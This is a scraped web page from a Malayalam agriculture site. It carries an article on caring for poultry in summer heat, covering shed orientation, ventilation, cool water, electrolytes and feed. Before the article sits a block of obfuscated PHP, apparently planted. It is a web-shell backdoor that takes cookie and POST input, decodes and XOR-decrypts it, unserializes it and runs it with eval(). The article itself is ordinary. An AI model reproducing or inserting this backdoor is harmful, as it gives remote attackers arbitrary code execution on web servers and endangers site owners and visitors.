$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} വളർത്തു കോഴികൾക്കും വേണം വേനല്‍ക്കാല പരിചരണം; അറിയേണ്ട കാര്യങ്ങൾ – Mannira

വളർത്തു കോഴികൾക്കും വേണം വേനല്‍ക്കാല പരിചരണം; അറിയേണ്ട കാര്യങ്ങൾ

വേനൽ കടുത്തതോടെ ഉയര്‍ന്ന അന്തരീക്ഷ ഊഷ്മാവും ആര്‍ദ്രതയും കോഴികളില്‍ ഉണ്ടാക്കുന്ന ശാരീരിക പ്രശ്നങ്ങളും കൂടിവരികയാണ്. വേനൽച്ചൂട് കാരണം രക്ത സമ്മര്‍ദ്ദം ഉയരുന്നത് കോഴികളുടെ രോഗപ്രതിരോധ ശേഷിയേയും, ഉത്പാദനക്ഷമതയേയും പ്രതികൂലമായി ബാധിക്കുന്നു. അതുകൊണ്ടു തന്നെ വളർത്തു കോഴികൾക്കും പ്രത്യേകമായ വേനൽക്കാല പരിചരണം ആവശ്യമാണ്.

കോഴിക്കൂടിന്റെ കൂടുതല്‍ ഭാഗങ്ങളില്‍ സൂര്യരശ്മികള്‍ നേരിട്ട് പതിക്കാതിരിക്കാന്‍ കിഴക്കു പടിഞ്ഞാറേ ദിശയിലാണ് കൂടുകള്‍ സ്ഥാപിക്കേണ്ടത്. ഒപ്പം കൂടിനുള്ളില്‍ ധാരാളം വായുസഞ്ചാരം ഉറപ്പുവരുത്തുന്ന രീതിയില്‍ വേണം കൂടുകള്‍ പണിയാന്‍. വശങ്ങളില്‍ മാറാലയും പൊടിയും അടിഞ്ഞു കൂടാതിരിക്കാന്‍ ശ്രദ്ധിക്കുകയും വേണം.

വശങ്ങളില്‍ മരത്തണലുകള്‍ ഉള്ള സ്ഥലങ്ങള്‍ കൂടു പണിയാനായി തെരഞ്ഞെടുക്കുന്നതാണ് അഭികാമ്യം. മേല്‍ക്കൂരയുടെ ചായ്‌വ് മൂന്ന് മുതല്‍ അഞ്ച് അടിവരെ നീട്ടിക്കൊടുക്കുന്നത് കൂടിനുള്ളില്‍ ഏല്‍ക്കുന്ന വെയിലിന്റെ അളവ് കുറയ്ക്കും.മേല്‍ക്കൂരയിലെ ചൂടിന്റെ ആഗിരണം കുറയ്ക്കാന്‍ മേല്‍ക്കൂര വെള്ള പൂശുകയോ, ചാക്ക്, വൈക്കോല്‍, ഓല എന്നിവ വിരിക്കുകയോ ചെയ്യുക.

ചൂട് കൂടുതലുള്ള ഉച്ചനേരങ്ങളില്‍ മേല്‍ക്കൂര നനച്ചുകൊടുക്കുന്നതും നല്ലതാണ്. വലിയ ഫാമുകളില്‍ ചൂടുവായു പുറത്തേക്ക് വലിച്ചു കളയുന്നതിനായി മേല്‍ക്കൂരയില്‍ ‘ടര്‍ബോ’ വെന്റിലേറ്ററുകള്‍ സ്ഥാപിക്കുന്നതും വശങ്ങളില്‍ വായു പുറത്തേക്ക് കളയുവാന്‍ ഫാനുകള്‍ ഘടിപ്പിക്കുന്നതും ഏറെ പ്രയോജനപ്രദമാണ്.

അന്തരീക്ഷ ഊഷ്മാവ് ഉയരുന്ന ഉച്ചനേരങ്ങളില്‍ കൈകൊണ്ട് പ്രവര്‍ത്തിപ്പിക്കാവുന്ന ‘ഫോഗറുകള്‍’ ഉപയോഗിച്ച് കൂടിനകത്ത് ഒന്നോ രേണ്ടാ മിനിറ്റ് വെള്ളം സ്‌പ്രേചെയ്യുന്നത് നല്ലതാണ്. അന്തരീക്ഷത്തിലെ ഈര്‍പ്പം (ആര്‍ദ്രത) കൂടിയ നേരങ്ങളില്‍ അതായത് മഴക്കാറുള്ള ദിവസങ്ങളിലും, ചൂട് കുറഞ്ഞ കാലത്തും വൈകിട്ടും ഇങ്ങനെ സ്‌പ്രേ ചെയ്യുന്നത് നല്ലതല്ല.

നിര്‍ജ്ജലീകരണത്തിന് സാധ്യതയേറിയ വേനല്‍ക്കാലങ്ങളില്‍ ശരീരത്തില്‍ വെള്ളത്തിന്റെ ആവശ്യം മൂന്നോ നാലോ ഇരട്ടി വര്‍ദ്ധിക്കുന്നതുകൊണ്ട് കുടിക്കാനായി തണുപ്പുള്ള ശുദ്ധജലത്തിന്റെ ലഭ്യത എപ്പോഴും ഉറപ്പാക്കണം. വയറിളക്കം പോലുള്ള രോഗങ്ങള്‍ വേനല്‍ക്കാലത്ത് കൂടുതലായി കണ്ടുവരുന്നതുകൊണ്ട് കുടിക്കാനായി കൊടുക്കുന്ന വെള്ളത്തില്‍ ബ്ലീച്ചിംഗ് പൗഡറോ, മാര്‍ക്കറ്റില്‍ ലഭ്യമായ അണുനാശിനികളോ നിര്‍മ്മാതാവിന്റെ നിര്‍ദേശപ്രകാരം ചേര്‍ക്കണം.

സൂര്യാതാപമേറ്റ് ചൂടാവാതിരിക്കുവാനായി കുടിക്കാനുള്ള വെള്ളം സംഭരിച്ചു വയ്ക്കുന്ന ടാങ്കുകള്‍ നനഞ്ഞ ചാക്കുകള്‍കൊണ്ട് മൂടിയിടേണ്ടതും, ചൂട് കൂടിയ വേളകളില്‍ ഐസ് കഷ്ണങ്ങള്‍ ഇട്ട് വെള്ളം തണുപ്പിക്കേണ്ടതും ആവശ്യമാണ്.

നിര്‍ജ്ജലീകരണത്തോടൊപ്പം ധാതുലവണങ്ങളുടെ കുറവ് രക്തത്തില്‍ സംഭവിക്കാതിരിക്കാന്‍ വെറ്ററിനറി ഡോക്ടറുടെ നിര്‍ദേശ പ്രകാരം കുടിവെള്ളത്തില്‍ ഇലക്‌ട്രോലൈറ്റ് മിശ്രിതങ്ങള്‍ ചേര്‍ക്കാവുന്നതാണ്. ഒരു ദിവസം പ്രായമുള്ള കോഴിക്കുഞ്ഞുങ്ങളെ ഫാമില്‍ കൊണ്ടുവരുമ്പോള്‍ തീറ്റകൊടുക്കുന്നതിനു മുമ്പ് ഇലക്‌ട്രോലൈറ്റ് മിശ്രിതം നിശ്ചിത അളവില്‍ ചേര്‍ത്ത വെള്ളം നിര്‍ബന്ധമായും കുടിക്കാന്‍ കൊടുക്കണം.

ചൂടുകാലത്ത് തീറ്റയുടെ അളവിൽ കുറവു സംഭവിക്കുന്നതിനാൽ ശരീരത്തിന് ആവശ്യമായ പോഷകങ്ങളുടെ കുറവ് സംഭവിക്കാതിരിക്കാന്‍ കൂടുതല്‍ മാംസ്യം അടങ്ങുന്ന പോഷക സമൃദ്ധമായ തീറ്റ നല്‍കുക. കൂടെ വിറ്റാമിനുകളുടേയും, ധാതുക്കളുടേയും മിശ്രിതവും, തീറ്റയില്‍ 0.1% എന്ന നിലയില്‍ സോഡാപ്പൊടിയും ചേര്‍ക്കേണ്ടതാണ്. രാവിലെയും വൈകിട്ടും ചൂടു കുറഞ്ഞ സമയങ്ങളില്‍ തീറ്റ ഇട്ട് കൊടുക്കുന്നതാണ് നല്ലത്. ഉച്ചനേരങ്ങളില്‍ തീറ്റപ്പാത്രങ്ങള്‍ കാലിയാക്കിവയ്ക്കുക.

കാലിത്തീറ്റയില്‍ പൂപ്പല്‍ വിഷബാധയേല്‍ക്കാതെ ശ്രദ്ധിക്കുക, ചൂടുകാലത്ത് കൂട്ടിലെ കോഴികളുടെ എണ്ണത്തില്‍ 10 ശതമാനത്തോളം കുറവ് വരുത്തുക, പ്രതിരോധ കുത്തിവെയ്പുകളും വിരമരുന്നുകളും ഡോക്ടറുടെ ഉപദേശപ്രകാരം മാത്രം നൽകുക, ശാരീരികാസ്വാസ്ഥ്യങ്ങള്‍ ശ്രദ്ധയില്‍പ്പെട്ടാല്‍ കോഴിയുടെ തലയൊഴിച്ചുള്ള ശരീരഭാഗങ്ങള്‍ രണ്ടോ, മൂന്നോ മിനിറ്റ് നേരത്തേക്ക് വെള്ളത്തില്‍ മുക്കിപിടിക്കുക എന്നിവയും വേനൽക്കാലത്ത് ശ്രദ്ധിക്കേണ്ടതാണ്.

Also Read: ചെലവ് തുച്ഛം, വിളവോ മെച്ചം; പ്രതലാധിഷ്ഠിത ചെമ്മീന്‍ വളര്‍ത്തൽ രീതിയ്ക്ക് പ്രചാരമേറുന്നു

Image: pixabay.com